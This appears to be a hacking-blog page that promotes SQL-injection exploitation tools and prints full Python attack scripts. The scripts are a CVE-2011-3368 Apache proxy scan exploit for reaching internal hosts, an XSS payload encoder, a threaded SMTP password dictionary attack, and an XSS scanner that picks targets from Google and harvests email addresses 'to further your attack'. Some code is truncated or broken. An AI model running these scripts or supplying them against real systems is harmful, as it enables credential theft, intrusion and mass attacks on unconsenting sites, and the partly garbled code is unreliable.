IronWASP – Iron Web application Advanced Security testing Platform
IronWASP (Iron Web application Advanced Security testing Platform) is an open source system for web application vulnerability testing. It is designed to be customizable to the extent where users can create their own custom security scanners using it. Though an advanced user with Python/Ruby scripting expertise would be able to make full use of the platform, a lot of the tool’s features are simple enough to be used by absolute beginners.
Learn more about it here | Download from here
Passive Plug-ins
- Analyzes all traffic going through the tool
- Can also modify the traffic
- Identifies vulnerabilities passively
Eg: Passwords sent over clear-text, Http-Only /Secure flag missing in cookies
Active Plug-ins
- Performs scans against the target to
- identify vulnerabilities
- Executed only when the user explicitly
- calls them
- Fine-grained scanning support
Eg: Cross-site Scripting, SQL Injection
IronWASP performs Taint Analysis forDOM based XSS, identifies Sources and Sinks and traces them through the code. Also custom Source and Sink objects can be configured.
SecPoint Netbios Share Scanner
The Netbios Share Samba Scanner can scan C classes and reveal all open shares. It will tell you all the information and even show the content of the shares. It will also show you shares that are not accessible. You can provide a username and password to it.
Mole – automatic SQL Injection exploitation tool
The Mole is an automatic SQL Injection exploitation tool. Only by providing a vulnerable URL and a valid string on the site it can detect the injection and exploit it, either by using the union technique or a boolean query based technique.
Features:
* Support for injections using Mysql, SQL Server, Postgres and Oracle databases.
* Command line interface. Different commands trigger different actions.
* Auto-completion for commands, command arguments and database, table and columns names.
* Support for query filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
* Developed in python 3.
Download windows version or linux
Tutorial and webpage here.
pythonsqldumper
This is a open source SQL dumper written in python.
Features:
- Databases support : MySQL
- Injection methods : INBAND, BLIND
- Injection in all parameters sent to server GET, POST, HEADERS (Cookie, User-Agent,...)
- Custom headers
- Supports mod_rewrite injection
- Supports injection in parameters encoded in base64 algoritm
- Supports proxy (HTTP, SOCKET4, SOCKET5)
- Supports injection in HTTPS throw proxy (only socket)
- Supports custom user query injection
- Save all extracted data to a dump file
- Dumps only structure of database
- Increases delay between two consecutive failed requests (allow the server to chill down)
- Delay between requests
Bugs and suggestions at : tdx_ev@yahoo.com. Download here. Project here
Apache mod_proxy Proof Of Concept
[cc lang="python"]#!/usr/bin/env python
import socket
import string
import getopt, sys
known_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080]
def send_request(url, apache_target, apache_port, internal_target, internal_port, resource):
get = "GET " + url + "@" + internal_target + ":" + internal_port + "/" + resource + " HTTP/1.1\r\n"
get = get + "Host: " + apache_target + "\r\n\r\n"
remoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remoteserver.settimeout(3)
try:
remoteserver.connect((apache_target, int(apache_port)))
remoteserver.send(get)
return remoteserver.recv(4096)
except:
return ""
def get_banner(result):
return result[string.find(result, "\r\n\r\n")+4:]
def scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource):
print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource)
for port in tested_ports:
port = str(port)
result = send_request(url, apache_target, apache_port, internal_target, port, resource)
if string.find(result,"HTTP/1.1 200")!=-1 or \
string.find(result,"HTTP/1.1 30")!=-1 or \
string.find(result,"HTTP/1.1 502")!=-1:
print "- Open port: " + port + "/TCP"
print get_banner(result)
elif len(result)==0:
print "- Filtered port: " + port + "/TCP"
else:
print "- Closed port: " + port + "/TCP"
def usage():
print
print "CVE-2011-3368 proof of concept by Rodrigo Marcos"
print "http://www.secforce.co.uk"
print
print "usage():"
print "python apache_scan.py [options]"
print
print " [options]"
print " -r: Remote Apache host"
print " -p: Remote Apache port (default is 80)"
print " -u: URL on the remote web server (default is /)"
print " -d: Host in the DMZ (default is 127.0.0.1)"
print " -e: Port in the DMZ (enables 'single port scan')"
print " -g: GET request to the host in the DMZ (default is /)"
print " -h: Help page"
print
print "examples:"
print " - Port scan of the remote host"
print " python apache_scan.py -r www.example.com -u /images/test.gif"
print " - Port scan of a host in the DMZ"
print " python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local"
print " - Retrieve a resource from a host in the DMZ"
print " python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html"
print
def print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource):
print
print "CVE-2011-3368 proof of concept by Rodrigo Marcos"
print "http://www.secforce.co.uk"
print
print " [+] Target: " + apache_target
print " [+] Target port: " + apache_port
print " [+] Internal host: " + internal_target
print " [+] Tested ports: " + str(tested_ports)
print " [+] Internal resource: " + resource
print
def main():
global apache_target
global apache_port
global url
global internal_target
global internal_port
global resource
try:
opts, args = getopt.getopt(sys.argv[1:], "u:r:p:d:e:g:h", ["help"])
except getopt.GetoptError:
usage()
sys.exit(2)
try:
for o, a in opts:
if o in ("-h", "--help"):
usage()
sys.exit(2)
if o == "-u":
url=a
if o == "-r":
apache_target=a
if o == "-p":
apache_port=a
if o == "-d":
internal_target = a
if o == "-e":
internal_port=a
if o == "-g":
resource=a
except getopt.GetoptError:
usage()
sys.exit(2)
if apache_target == "":
usage()
sys.exit(2)
url = "/"
apache_target = ""
apache_port = "80"
internal_target = "127.0.0.1"
internal_port = ""
resource = "/"
main()
if internal_port!="":
tested_ports = [internal_port]
else:
tested_ports = known_ports
scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)
[/cc]
Python XSS payload encoder
[cc lang="python"]'''
Python XSS payload encoder
Author: BGS (rstcenter.com)
Contributor cmiN (rstcenter.com)
Date: 13 August 2011
Version: Python 2.7
'''
#!/usr/bin/env python
import time
import sys
import urllib2
import base64
def main():
try:
if sys.argv[1] == "help":
print '[-]'+time.ctime()
print'''[-]Instructions:
encoder.py
Available encodings: ascii b64 hex url
[-]Exiting...
'''
elif sys.argv[1] == "b64":
b64_encode()
elif sys.argv[1] == "ascii":
ascii_encode()
elif sys.argv[1] == "hex":
hex_encode()
elif sys.argv[1] == "url":
url_encode()
else:
sys.exit(1)
except Exception, e:
print 'Type "encoder.py help" for instructions! '
sys.exit(1)
def b64_encode():
payload = sys.argv[2]
encoded = base64.standard_b64encode(payload)
print ' ################## B64 String #######################'
print ''
print 'String:' + encoded
print ''
print "#################### >>EOF<< #########################"
def ascii_encode():
payload = sys.argv[2]
string = ''
for w in payload:
string += str(ord(w)) + ","
print ' ################## ASCII String #####################'
print ''
print 'string.fromCharCode(' + string.strip(",") +')'
print ''
print "#################### >>EOF<< #########################"
def hex_encode():
payload = sys.argv[2]
encoded = payload.encode('hex')
print ' ################## HEX String #######################'
print ''
print 'String:' + encoded
print ''
print "#################### >>EOF<< #########################"
def url_encode():
payload = sys.argv[2]
encoded = urllib2.quote(payload.encode("utf8"))
print ' ################## URL String #######################'
print ''
print 'String:' + encoded
print ''
print "#################### >>EOF<< #########################"
if __name__ == '[/cc]
SMTP Dictionary Attack in python
[cc lang="python"]#! /usr/bin/env python3.2
# SMTP Dictionary Attack
# 21.03.2011 cmiN
from smtplib import SMTP
from sys import argv
import threading
def usage():
print("\tUsage: source.ext
print("Note that hosts, users and words are text files with
print("Threads is an integer.")
print("Timeout is a float in seconds and is optional.")
print("Example: smda.py hosts.txt C:\\users.txt /tmp/words.txt 10 1")
def fill_vec(name, vec):
count = 0
with open(name, "rt") as fin:
for x in fin:
y = x.strip()
if not y in vec:
vec.add(y)
count += 1
return count
class SDA(threading.Thread):
hvec = None
timeout = None
count = 0
fobj = None
def __init__(self, user, word):
threading.Thread.__init__(self)
self.user = user
self.word = word
def run(self):
for host in list(SDA.hvec):
try:
server = SMTP(host, timeout=SDA.timeout)
server.login(self.user, self.word)
server.quit()
if host in SDA.hvec:
SDA.hvec.remove(host)
string = "%s %s %s\n" % (host, self.user, self.word)
SDA.fobj.write(string)
SDA.fobj.flush()
SDA.count += 1
except:
pass
def process(hosts, users, words, threads, timeout=None):
hvec, uvec, wvec = set(), set(), set()
comp = fill_vec(hosts, hvec) * ((fill_vec(users, uvec) * fill_vec(words, wvec)) / threads)
print("Processing %d requests per thread. Please wait..." % comp)
SDA.hvec = hvec
SDA.timeout = timeout
SDA.fobj = open("working.txt", "at")
for user in uvec:
for word in wvec:
while threading.active_count() > threads:
pass
SDA(user, word).start()
while threading.active_count() > 1:
pass
SDA.fobj.write("=" * 50 + "\n")
SDA.fobj.close()
print("Finished! Were found %d working SMTPs (see 'working.txt')." % SDA.count)
def main():
if len(argv) == 6:
process(argv[1], argv[2], argv[3], int(argv[4]), float(argv[5]))
elif len(argv) == 5:
process(argv[1], argv[2], argv[3], int(argv[4]))
else:
usage()
if __name__ == "__main__":
main()[/cc]
by cmiN@rrstcenter
python xss scanner
[cc lang="python"]#!/usr/bin/python
#XSS Scanner that can find hosts using a google query or search one site.
#If XSS is found it attempts to collect email addresses to further your attack
#or warn the target of the flaw. When the scan is complete
#it will print out the XSS's found and or write to file, it will find false positives
#so manually check before getting to excited. It also has verbose mode and
#you can change the alert pop-up message, check options!!
#
##Changelog v1.1: added options, verbose, write to file, change alert
#Changelog v1.2: added more xss payloads, an exception, better syntax, more runtime feedback
#Changelog v1.3: added https support, more xss payloads, the ability to change port, fixed #some user input problems, exiting without error messages with Ctrl-C (KeyboardInterrupt)
#
#d3hydr8[at]gmail[dot]com
import sys, urllib2, re, sets, random, httplib, time, socket
def title():
print "\n\t d3hydr8[at]gmail[dot]com XSS Scanner v1.3"
print "\t-----------------------------------------------"
def usage():
title()
print "\n Usage: python XSSscan.py
def StripTags(text):
finished = 0
while not finished:
finished = 1
start = text.find("<")
if start >= 0:
stop = text[start:].find(">")
if stop >= 0:
text = text[:start] + text[start+stop+1:]
finished = 0
return text
def timer():
now = time.localtime(time.time())
return time.asctime(now)
def geturls(query):
counter = 10
urls = []
while counter < int(sys.argv[3]):
url = 'http://www.google.com/search?hl=en&q='+query+'&hl=en&lr=&start='+repr(counter)+'&sa=N'
opener = urllib2.build_opener(url)
opener.addheaders = [('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)')]
data = opener.open(url).read()
hosts = re.findall(('\w+\.[\w\.\-/]*\.\w+'),StripTags(data))
#Lets add sites found to a list if not already or a google site.
#We don't want to upset the people that got our list for us.
for x in hosts:
if x.find('www') != -1:
x = x[x.find('www'):]
if x not in urls and re.search("google", x) == None:
urls.append(x)
counter += 10
return urls
def getemails(site):
try:
if site.split("/",1)[0] not in done:
print "\t[+] Collecting Emails:",site.split("/",1)[0]
webpage = urllib2.urlopen(proto+"://"+site.split("/",1)[0], port).read()
emails = re.findall('[\w\.\-]+@[\w\.\-]+\.\w\w\w', webpage)
done.append(site.split("/",1)[0])
if emails:
return emails
except(KeyboardInterrupt):
print "\n[-] Cancelled -",timer(),"\n"
sys.exit(1)
except(IndexError):
pass
def getvar(site):
names = []
actions = []
print "\n","-"*45
print "[+] Searching:",site
try:
webpage = urllib2.urlopen(proto+"://"+site, port).read()
emails = re.findall('[\w\.\-]+@[\w\.\-]+\.\w\w\w', webpage)
var = re.findall("\?[\w\.\-/]*\=",webpage)
if len(var) >=1:
var = list(sets.Set(var))
found_action = re.findall("action=\"[\w\.\-/]*\"", webpage.lower())
found_action = list(sets.Set(found_action))
if len(found_action) >= 1:
for a in found_action:
a = a.split('"',2)[1]
try:
if a[0] != "/":
a = "/"+a
except(IndexError):
pass
actions.append(a)
found_names = re.findall("name=\"[\w\.\-/]*\"", webpage.lower())
found_names = list(sets.Set(found_names))
for n in found_names:
names.append(n.split('"',2)[1])
print "[+] Variables:",len(var),"| Actions:",len(actions),"| Fields:",len(names)
print "[+] Avg Requests:",(len(var)+len(names)+(len(actions)*len(names))+(len(actions)*len(names)))*len(xss_payloads)
if len(var) >= 1:
for v in var:
if site.count("/") >= 2:
for x in xrange(site.count("/")):
for xss in xss_payloads:
tester(site.rsplit('/',x+1)[0]+"/"+v+xss)
for xss in xss_payloads:
tester(site+"/"+v+xss)
if len(names) >= 1:
for n in names:
if site.count("/") >= 2:
for x in xrange(site.count("/")):
for xss in xss_payloads:
tester(site.rsplit('/',x+1)[0]+"/"+"?"+n+"="+xss)
for xss in xss_payloads:
tester(site+"/"+"?"+n+"="+xss)
if len(actions) != 0 and len(names) >= 1:
for a in actions:
for n in names:
if site.count("/") >= 2:
for x in xrange(site.count("/")):
for xss in xss_payloads:
tester(site.rsplit('/',x+1)[0]+a+"?"+n+"="+xss)
#tester(site.split("/")[0]+a+"?"+n+"="+xss)
if len(actions) != 0 and len(var) >= 1:
for a in actions:
for v in var:
if site.count("/") >= 2:
for x in xrange(site.count("/")):
for xss in xss_payloads:
tester(site.rsplit('/',x+1)[0]+a+v+xss)
else:
for xss in xss_payloads:
tester(site.split("/")[0]+a+v+xss)
if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google":
urls.remove(site)
except(socket.timeout, IOError, ValueError, socket.error, socket.gaierror):
if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google":
urls.remove(site)
pass
except(KeyboardInterrupt):
print "\n[-] Cancelled -",timer(),"\n"
sys.exit(1)
def tester(target):
if verbose ==1:
if message != "":
print "Target:",target.replace(alert ,message)
else:
print "Target:",target
try:
source = urllib2.urlopen(proto+"://"+target, port).read()
h = httplib.HTTPConnection(target.split('/')[0], int(port))
try:
h.request("GET", "/"+target.split('/',1)[1])
except(IndexError):
h.request("GET", "/")
r1 = h.getresponse()
if verbose ==1:
print "\t[+] Response:",r1.status, r1.reason
if re.search(alert.replace("%2D","-"), source) != None and r1.status not in range(303, 418):
if target not in found_xss:
if message != "":
print "\n[!] XSS:", target.replace(alert ,message)
else:
print "\n[!] XSS:", target
print "\t[+] Response:",r1.status, r1.reason
emails = getemails(target)
if emails:
print "\t[+] Email:",len(emails),"addresses\n"
found_xss.setdefault(target, list(sets.Set(emails)))
else:
found_xss[target] = "None"
except(socket.timeout, socket.gaierror, socket.error, IOError, ValueError, httplib.BadStatusLine, httplib.IncompleteRead, httplib.InvalidURL):
pass
except(KeyboardInterrupt):
print "\n[-] Cancelled -",timer(),"\n"
sys.exit(1)
except():
pass
if len(sys.argv) <= 2:
usage()
sys.exit(1)
for arg in sys.argv[1:]:
if arg.lower() == "-v" or arg.lower() == "-verbose":
verbose = 1
if arg.lower() == "-w" or arg.lower() == "-write":
txt = sys.argv[int(sys.argv[1:].index(arg))+2]
if arg.lower() == "-a" or arg.lower() == "-alert":
message = re.sub("\s","%2D",sys.argv[int(sys.argv[1:].index(arg))+2])
title()
socket.setdefaulttimeout(3)
found_xss = {}
done = []
count = 0
proto = "http"
alert = "D3HYDR8%2D0wNz%2DY0U"
print "\n[+] XSS_scan Loaded"
try:
if verbose ==1:
print "[+] Verbose Mode On"
except(NameError):
verbose = 0
print "[-] Verbose Mode Off"
try:
if message:
print "[+] Alert:",message
except(NameError):
print "[+] Alert:",alert
message = ""
pass
xss_payloads = ["%22%3E%3Cscript%3Ealert%28%27"+alert+"%27%29%3C%2Fscript%3E",
"%22%3E",
"%22%3E",
"'';!--\"<%27"+alert+"%27>=&{()}",
"';alert(0)//\';alert(1)//%22;alert(2)//\%22;alert(3)//--%3E%3C/SCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(%27"+alert+"%27)%3C/SCRIPT%3E=&{}%22);}alert(6);function",
""]
try:
if txt:
print "[+] File:",txt
except(NameError):
txt = None
pass
print "[+] XSS Payloads:",len(xss_payloads)
if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google":
try:
if sys.argv[3].isdigit() == False:
print "\n[-] Argument [",sys.argv[3],"] must be a number.\n"
sys.exit(1)
else:
if int(sys.argv[3]) <= 10:
print "\n[-] Argument [",sys.argv[3],"] must be greater than 10.\n"
sys.exit(1)
except(IndexError):
print "\n[-] Need number of hosts to collect.\n"
sys.exit(1)
query = re.sub("\s","+",sys.argv[2])
port = "80"
print "[+] Query:",query
print "[+] Querying Google..."
urls = geturls(query)
print "[+] Collected:",len(urls),"hosts"
print "[+] Started:",timer()
print "\n[-] Cancel: Press Ctrl-C"
time.sleep(3)
while len(urls) > 0:
print "-"*45
print "\n[-] Length:",len(urls),"remain"
getvar(random.choice(urls))
if sys.argv[1].lower() == "-s" or sys.argv[1].lower() == "-site":
site = sys.argv[2]
try:
if sys.argv[3].isdigit() == False:
port = "80"
else:
port = sys.argv[3]
except(IndexError):
port = "80"
print "[+] Site:",site
print "[+] Port:",port
if site[:7] == "http://":
site = site.replace("http://","")
if site[:8] == "https://":
proto = "https"
if port == "80":
print "[!] Using port 80 with https? (443)"
site = site.replace("https://","")
print "[+] Started:",timer()
print "\n[-] Cancel: Press Ctrl-C"
time.sleep(4)
getvar(site)
print "-"*65
print "\n\n[+] Potential XSS found:",len(found_xss),"\n"
time.sleep(3)
if txt != None and len(found_xss) >=1:
xss_file = open(txt, "a")
xss_file.writelines("\n\td3hydr8[at]gmail[dot]com XSS Scanner v1.3\n")
xss_file.writelines("\t------------------------------------------\n\n")
print "[+] Writing Data:",txt
else:
print "[-] No data written to disk"
for k in found_xss.keys():
count+=1
if txt != None:
if message != "":
xss_file.writelines("["+str(count)+"] "+k.replace(alert ,message)+"\n")
else:
xss_file.writelines("["+str(count)+"] "+k+"\n")
if message != "":
print "\n["+str(count)+"]",k.replace(alert ,message)
else:
print "\n["+str(count)+"]",k
addrs = found_xss[k]
if addrs != "None":
print "\t[+] Email addresses:"
for addr in addrs:
if txt != None:
xss_file.writelines("\tEmail: "+addr+"\n")
print "\t -",addr
print "\n[-] Done -",timer(),"\n"[/cc]
Disclaimer
Categories
- android (1)
- antivirus (1)
- backup (1)
- backup exec (2)
- bruteforce (6)
- conference (2)
- CRSF (2)
- DirectAdmin (1)
- DoS (11)
- enumeration (2)
- Fără categorie (2)
- flash (2)
- Fuzzer (2)
- games (1)
- hacking (116)
- how-to (32)
- Information gathering (2)
- lfi (3)
- linux (27)
- mobile (1)
- ms exchange (2)
- News (2)
- Phishing (1)
- php (1)
- rdp (1)
- rfi (5)
- rootkit (1)
- scripts (33)
- seo (1)
- sniff (3)
- social engineering (2)
- source code (33)
- sqli (16)
- ssh (2)
- symantec (3)
- tools (73)
- tutorials (20)
- tutorials (1)
- Uncategorized (7)
- vranger (1)
- windows (12)
- wireless (1)
- wsus (1)
- xpath (1)
- xsrf (1)
- xss (12)
